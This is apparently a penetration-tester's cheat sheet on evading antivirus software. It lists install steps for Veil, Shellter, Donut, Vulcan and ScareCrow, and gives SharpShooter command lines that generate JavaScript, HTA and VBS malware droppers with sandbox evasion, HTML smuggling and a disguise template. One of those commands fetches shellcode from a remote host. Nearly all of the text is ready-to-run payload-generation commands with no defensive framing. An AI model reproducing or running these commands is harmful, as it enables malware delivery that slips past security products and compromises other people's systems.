Bypassing AV
Veil Framework
Install on Kali:
apt install veil
/usr/share/veil/config/setup.sh --force --silent
Reference: https://github.com/Veil-Framework/Veil
Shellter
Source: https://www.shellterproject.com/download/
apt install shellter
SharpShooter
Stageless JavaScript Payload:
SharpShooter.py --stageless --dotnetver 4 --payload js --output foo --rawscfile ./raw.txt --sandbox 1=contoso,2,3
Stageless HTA Payload:
SharpShooter.py --stageless --dotnetver 2 --payload hta --output foo --rawscfile ./raw.txt --sandbox 4 --smuggle --template mcafee
Staged VBS:
SharpShooter.py --payload vbs --delivery both --output foo --web http://www.foo.bar/shellcode.payload --dns bar.foo --shellcode --scfile ./csharpsc.txt --sandbox 1=contoso --smuggle --template mcafee --dotnetver 4
Reference: https://github.com/mdsecactivebreach/SharpShooter
Donut
Source: https://github.com/TheWover/donut
Vulcan
Source: https://github.com/praetorian-code/vulcan
ScareCrow
Source: https://github.com/optiv/ScareCrow
sudo apt install golang
go get github.com/fatih/color
go get github.com/yeka/zip
go get github.com/josephspurrier/goversioninfo
go build ScareCrow.go
./ScareCrow